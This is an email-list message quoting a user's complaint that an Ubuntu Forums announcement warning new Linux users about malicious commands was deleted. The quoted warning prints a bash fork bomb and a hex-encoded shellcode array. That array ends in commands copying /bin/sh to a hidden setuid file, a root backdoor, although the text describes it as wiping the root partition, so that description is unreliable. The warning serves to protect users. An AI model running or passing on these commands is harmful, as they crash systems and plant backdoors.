I am revolted against the injustice of Ubuntu Forums administrators and moderators .
Em sex, 21 de dez de 2018 00:17, Command FreeBSD <commandfree...@gmail.com> escreveu: > The article that have spoken about Linux malicious commands that was > posted in Ubuntu Forums was restored, but who accessed this link yesterday > and this morning saw that this article has been deleted. > > Very strange! > > I also posted this topic in Ask Ubuntu Estack Overflow Exchange: > https://askubuntu.com/questions/1103483/why-the-article-that-have-spoken-about-linux-malicious-commands-that-was-posted?noredirect=1#comment1819053_1103483 > > I want to tell for the newbies to Linux that the article that have spoken > about Linux malicious commands that was posted in Ubuntu Forums was > deleted: https://ubuntuforums.org/announcement.php?f=326 > > The following messages was written in this article that was posted in > Ubuntu Forums: > > [quote] Ubuntu Forums has a strict zero-tolerance policy when it comes to > posting dangerous commands. In the past members have been banned for > posting dangerous commands. If the intent is malicious, this is simply > unnacceptable. If it is meant as a joke – it is not funny. > > Please be cautious when a command is suggested or if directed to download > script/s as a solution to a problem. When in doubt as to the safety of the > procedure, it's always a good idea to wait for more opinions, and/or have > the command explained and verify if the explanation makes sense by > consulting readily available documentation on Linux commands (such as > manpages). If you have any doubts about the content of a command or script, > report the post/thread and forum staff will investigate. > > Please take care when posting commands or scripts to assist other users. > Post only well known, documented and current commands appropriate for the > operating system in use, or scripts from reputable sources. If you do post > commands in order to help someone but which have the potential to be > dangerous, always make sure you warn possible users of the dangers, not > just to the user you are helping, but others who may come across the post > later. If posting scripts that help with various tasks, please be prepared > to provide a source and description of the content. [/quote] > > [quote] Forkbomb: It is a malicious script that will execute a huge number > of processes until your system freezes, forcing you to do a hard reboot > which may cause data corruption or data damage. > > The below command looks really intriguing and curiosity may lead new and > inexperienced users to execute it! DON'T EXECUTE THEM! [/quote] > > [code] :(){ :|:& };:[/code] > > [quote] The below command is nothing but the first command above (rm -rf). > Here the codes are hidden in hex so that an ignorant user may be fooled. > Running the below code in your terminal will wipe your root partition. > > This command here shows that the threat may be hidden and not normally > detectable sometimes. You must be aware of what you are doing and what > would be the result. Don’t compile/run codes from an unknown source. > > char esp[] *attribute* ((section(“.text”))) /* e.s.p release */ = > “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ > “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ > “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ > “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ > “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ > “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ > “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 > /tmp/.beyond;”; [/quote] > > The messages that I quoted above was written in following link: > https://ubuntuforums.org/announcement.php?f=326 > > This article have opoken about Linux malicious commands. > > Why this article that have spoken about Linux malicious commands that was > posted in Ubuntu Forums was deleted? > > I posted this topic in Ubuntu Forums, but this topic was moved to The Jail > and then deleted. > > It appears that Ubuntu Forums administrators want to fool the newbies. > > EDIT: > > I want to tell for the newbies to Linux that the article that have spoken > about Linux malicious commands that was posted in Ubuntu Forums was deleted > and that it appears that Ubuntu Forums administrators want to fool the > newbies: https://ubuntuforums.org/announcement.php?f=326 > > Who accessed the Ubuntu Forums this morning saw that I posted about > malicious commands in General Help and News to Ubuntu in Ubuntu Forums, but > the topics that I posted in Ubuntu Forums was deleted. Very strange! It > appears that Ubuntu Forums administrators want to fool the newbies. >